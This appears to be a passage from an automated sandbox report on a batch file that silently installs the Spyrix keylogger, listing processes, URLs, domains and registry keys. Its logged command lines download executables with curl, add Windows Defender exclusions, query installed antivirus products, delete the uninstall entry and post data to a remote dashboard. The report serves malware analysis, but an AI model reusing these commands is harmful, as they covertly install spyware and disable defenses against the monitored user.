gzip compressed data, max speed, from Unix, original size modulo 2^32 1269714
|
downloaded
|
||
Chrome Cache Entry: 658
|
ASCII text, with very long lines (1512)
|
downloaded
|
||
Chrome Cache Entry: 659
|
ASCII text
|
downloaded
|
||
Chrome Cache Entry: 660
|
ASCII text, with very long lines (3064)
|
downloaded
|
||
Chrome Cache Entry: 661
|
ASCII text
|
downloaded
|
||
Chrome Cache Entry: 662
|
C++ source, Unicode text, UTF-8 text
|
downloaded
|
||
Chrome Cache Entry: 663
|
ASCII text, with very long lines (5945)
|
dropped
|
||
Chrome Cache Entry: 664
|
gzip compressed data, max speed, from Unix, original size modulo 2^32 61324
|
downloaded
|
||
Chrome Cache Entry: 665
|
Java source, Unicode text, UTF-8 text, with very long lines (731)
|
dropped
|
||
Chrome Cache Entry: 666
|
ASCII text, with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 667
|
Web Open Font Format (Version 2), TrueType, length 44112, version 1.0
|
downloaded
|
||
Chrome Cache Entry: 668
|
Web Open Font Format (Version 2), TrueType, length 43608, version 1.0
|
downloaded
|
||
Chrome Cache Entry: 669
|
ASCII text
|
downloaded
|
||
Chrome Cache Entry: 670
|
gzip compressed data, max speed, from Unix, original size modulo 2^32 27077
|
dropped
|
||
Chrome Cache Entry: 671
|
ASCII text
|
dropped
|
||
Chrome Cache Entry: 672
|
ASCII text, with very long lines (628)
|
downloaded
|
||
Chrome Cache Entry: 673
|
ASCII text, with very long lines (1097)
|
downloaded
|
||
Chrome Cache Entry: 674
|
HTML document, ASCII text
|
downloaded
|
||
Chrome Cache Entry: 675
|
C++ source, Unicode text, UTF-8 text
|
dropped
|
||
Chrome Cache Entry: 676
|
ASCII text, with very long lines (2720)
|
downloaded
|
||
Chrome Cache Entry: 677
|
PNG image data, 184 x 184, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
Chrome Cache Entry: 678
|
Java source, ASCII text, with very long lines (1391)
|
downloaded
|
||
Chrome Cache Entry: 679
|
Java source, Unicode text, UTF-8 text, with very long lines (5161)
|
downloaded
|
||
Chrome Cache Entry: 680
|
ASCII text, with very long lines (5945)
|
downloaded
|
||
Chrome Cache Entry: 681
|
Java source, Unicode text, UTF-8 text, with very long lines (5161)
|
dropped
|
||
Chrome Cache Entry: 682
|
Java source, ASCII text, with very long lines (837)
|
downloaded
|
||
Chrome Cache Entry: 683
|
Java source, ASCII text, with very long lines (795)
|
downloaded
|
||
\Device\ConDrv
|
ASCII text, with CR, LF line terminators
|
dropped
|
||
\Device\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 1033 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\D0WmCTD2qO.bat" "
|
||
C:\Windows\System32\reg.exe
|
reg query "HKU\S-1-5-19\Environment"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\183942631522663'"
|
||
C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe
|
"C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"cmd.exe" /c C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878.cmd
|
||
C:\Windows\SysWOW64\reg.exe
|
reg query "HKU\S-1-5-19\Environment"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878'"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\183942631522663"
|
||
C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe
|
"C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe"
|
||
C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp
|
"C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp" /SL5="$30462,32862490,227328,C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]=
.exe"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\d.cmd
|
||
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
/value"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\d.cmd
|
||
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
/value"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex.cmd
|
||
C:\Windows\System32\reg.exe
|
reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex"
/y
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\pswd.cmd
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex.cmd
|
||
C:\Windows\System32\reg.exe
|
reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex"
/y
|
||
C:\Windows\SysWOW64\regedit.exe
|
"regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix
Free Keylogger_is1"
|
||
C:\Windows\SysWOW64\reg.exe
|
"reg.exe" delete "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" /f
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
|
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe"
|
||
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c plist.cmd
|
||
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c netstat.exe -e > "C:\Users\user\AppData\Local\Temp\nse"
|
||
C:\Windows\SysWOW64\NETSTAT.EXE
|
netstat.exe -e
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
|
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_C79C6F489015E0BC97F892E357DB7156
https://spyrix.net/dashboard/prg-actions
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
|
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_C79C6F489015E0BC97F892E357DB7156
https://spyrix.net/dashboard/prg-actions
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
|
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_C79C6F489015E0BC97F892E357DB7156
https://spyrix.net/dashboard/prg-actions
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe
|
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
|
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_C79C6F489015E0BC97F892E357DB7156
https://spyrix.net/dashboard/prg-actions
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c exit 83
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c exit 112
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c exit 121
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c exit 114
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c exit 105
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c exit 120
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\curl.exe
|
curl.exe --insecure -o "C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe" https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\curl.exe
|
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\l"
https://cdnbaynet.com/loader/link.php?prg_id=sfk
|
||
C:\Windows\SysWOW64\curl.exe
|
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]=
.exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\wbem\WMIC.exe
|
wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\wbem\WMIC.exe
|
wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\taskkill.exe
|
"C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM
akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\taskkill.exe
|
"C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM
akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\chcp.com
|
chcp 65001
|
||
C:\Windows\SysWOW64\timeout.exe
|
timeout 20
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\timeout.exe
|
timeout 6
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1912,i,17144999493896228581,15445594864361974383,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\tasklist.exe
|
TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
|
||
C:\Windows\SysWOW64\find.exe
|
find "spm"
|
||
C:\Windows\SysWOW64\tasklist.exe
|
TASKLIST /FI "IMAGENAME eq sem.exe" /FO CSV /NH
|
There are 70 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://www.jrsoftware.org/0
|
unknown
|
||
https://dashboard.spyrix.com/account/login-from-program?email=
|
unknown
|
||
https://api.dropbox.com/1/fileops/copy
|
unknown
|
||
https://dashboard.spyrix.com/account/login-from-program
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exev
|
unknown
|
||
https://spyrix.net/usr/monitor/
|
unknown
|
||
https://Spyrix.net/dashboard/prg-list
|
158.69.117.119
|
||
https://spyrix.net/dashboard/p
|
unknown
|
||
https://curl.haxx.se/libcurl/c/curl_easy_setopt.html
|
unknown
|
||
https://cdnbaynet.com/loader/link.php?prg_id=sfkU
|
unknown
|
||
http://www.indyproject.org/
|
unknown
|
||
https://spyrix.net/dashboard/prg-actionseDrive
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.execurl.exe
|
unknown
|
||
http://www.spyrix.com/pro_upgrade.htm?lic=
|
unknown
|
||
http://crl.certum.pl/ca.crl0:
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.e5
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C:
|
unknown
|
||
https://spyrix.net/dashboard/prg-actions
|
158.69.117.119
|
||
https://dashboard.spyrix.com/cdn.js
|
158.69.117.119
|
||
http://www.myspace.com/search/
|
unknown
|
||
https://api.dropbox.com/1/fileops/create_folder?
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.js
|
95.181.182.182
|
||
https://www.spyrix.com
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://spyrix.net/dashboard/prg-actionsll
|
unknown
|
||
http://www.innosetup.com/
|
unknown
|
||
https://spyrix.net/dashboard/prg-actionsin
|
unknown
|
||
https://spyrix.net/dashboard/proxy/upload
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download
|
unknown
|
||
https://api.dropbox.com/1/shares/dropbox
|
unknown
|
||
HTTPS://DASHBOARD.SPYRIX.COM/
|
unknown
|
||
https://spyrix.net/dashboard/prg-actionsubertlS
|
unknown
|
||
https://api-content.dropbox.com/1/files/dropbox
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/Modal-04ffda94.css
|
95.181.182.182
|
||
https://api-content.dropbox.com/1/files_put
|
unknown
|
||
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404
|
23.109.93.100
|
||
https://api.dropbox.com/1/oauth/request_token?
|
unknown
|
||
https://dashboard.spyrix.com/.spyrix.com/qqS
|
unknown
|
||
HTTPS://SPYRIX.NET/DASHBOARD/PRG-ACTIONS
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js
|
95.181.182.182
|
||
https://spyrix.net/das
|
unknown
|
||
https://api.dropbox.com/1/metadata/sandbox
|
unknown
|
||
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/
|
unknown
|
||
https://spyrix.net/usr/monitor/access.txt
|
unknown
|
||
http://www.actualkeylogger.com/help.html#registrate
|
unknown
|
||
http://www.ok.ru/dk?st.cmd=searchResult
|
unknown
|
||
http://repository.certum.pl/l3.cer0
|
unknown
|
||
https://api.dropbox.com/1/fileops/create_folder
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/Nunito-Regular-73dcaa51.woff2
|
95.181.182.182
|
||
https://swtb-download.spyrix-sfk.com/C
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js
|
95.181.182.182
|
||
http://html4/loose.dtd
|
unknown
|
||
https://spyrix.net/dashboard/prg-actions//swtb-
|
unknown
|
||
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
|
unknown
|
||
http://neftali.clubdelphi.com/
|
unknown
|
||
http://.css
|
unknown
|
||
https://filedn.com
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/ButtonTemplate.module-c837805f.js
|
95.181.182.182
|
||
https://api.dropbox.com/1/fileops/copy?
|
unknown
|
||
https://spyrix.net/dashboard/prg-actionsuu7
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/Button-ca236c00.css
|
95.181.182.182
|
||
https://dashboard.actualkeylogger.com
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/f
|
unknown
|
||
http://vk.com/search
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/en-5393c481.js
|
95.181.182.182
|
||
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe&bd
|
unknown
|
||
https://spyrix.net/dashboard/prg-actionsive#
|
unknown
|
||
http://vk.com/searchecp
|
unknown
|
||
http://www.actualkeylogger.com/buynow.html
|
unknown
|
||
http://.jpg
|
unknown
|
||
https://api.dropbox.com/1/fileops/move
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/Input.vue_vue_type_script_setup_true_lang-31858815.js
|
95.181.182.182
|
||
https://cdnbaynet.com/loader/link.php?prg_id=sfk77
|
unknown
|
||
http://www.actualkeylogger.com/help.htmlhttp://spyrix.com/manual.phpU
|
unknown
|
||
https://cdnbaynet.com/loader/link.php?prg_id=sfk&A
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeXsC
|
unknown
|
||
https://securcdn.com/loader/link.php?prg_id=sfkupowershell.exe
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeG
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/Button.module-6d4e91b8.js
|
95.181.182.182
|
||
https://cdn.cdndownload.net/dashboard30/assets/ButtonText-ead06ca1.css
|
95.181.182.182
|
||
https://www.certum.pl/CPS0
|
unknown
|
||
https://api-content.dropbox.com/1/chunked_upload
|
unknown
|
||
https://www.dropbox.com/1/oauth/authorize?oauth_token=open
|
unknown
|
||
https://spyrix.net/dashboard/prg-actionsuu
|
unknown
|
||
https://spyrix.net/dashboard/prg-actionsG
|
unknown
|
||
http://www.dk-soft.org/
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/ConfirmPhoneModal.module-3f369b32.js
|
95.181.182.182
|
||
http://filedn.com
|
unknown
|
||
https://g.live.com/odclientsettings/Prod/C:
|
unknown
|
||
https://api.dropbox.com/1/fileops/move?
|
unknown
|
||
https://spyrix.net/dashboard/prg-actionsOMEPATH-
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeN
|
unknown
|
||
https://api.dropbox.com/1/account/info
|
unknown
|
||
https://spyrix.net/usr/monitor/iorder.php?comp_id=
|
unknown
|
||
https://cdnbaynet.com/loader/link.php?prg_id=sfk8A
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exec
|
unknown
|
||
https://cdnbaynet.com/loader/link.php?prg_id=sfkWinsta0
|
unknown
|
||
http://schemas.mic
|
unknown
|
||
https://www.spyrix.com/purchase.php?prg=sfk
|
unknown
|
There are 90 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
swtb-download.spyrix-sfk.com
|
167.114.14.168
|
||
spyrix.net
|
158.69.117.119
|
||
dashboard.spyrix.com
|
158.69.117.119
|
||
www.google.com
|
142.250.181.228
|
||
filedn.com
|
23.109.93.100
|
||
cl-e0469d03.edgecdn.ru
|
95.181.182.182
|
||
cdnbaynet.com
|
167.114.14.170
|
||
cdn.cdndownload.net
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
192.168.2.8
|
unknown
|
unknown
|
||
167.114.14.168
|
swtb-download.spyrix-sfk.com
|
Canada
|
||
239.255.255.250
|
unknown
|
Reserved
|
||
158.69.117.119
|
spyrix.net
|
Canada
|
||
142.250.181.228
|
www.google.com
|
United States
|
||
167.114.14.170
|
cdnbaynet.com
|
Canada
|
||
95.181.182.182
|
cl-e0469d03.edgecdn.ru
|
Russian Federation
|
||
127.0.0.1
|
unknown
|
unknown
|
||
23.109.93.100
|
filedn.com
|
Netherlands
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
|
localSPM
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
|
localmon
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
Owner
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
SessionHash
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
Sequence
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\EnumKreg\value
|
tid
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
RegFiles0000
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
RegFilesHash
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
|
kbdsprt
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
|
localSPM
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
Inno Setup: Setup Version
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
Inno Setup: App Path
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
InstallLocation
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
Inno Setup: Icon Group
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
Inno Setup: User
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
Inno Setup: Language
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
DisplayName
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
UninstallString
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
QuietUninstallString
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
DisplayVersion
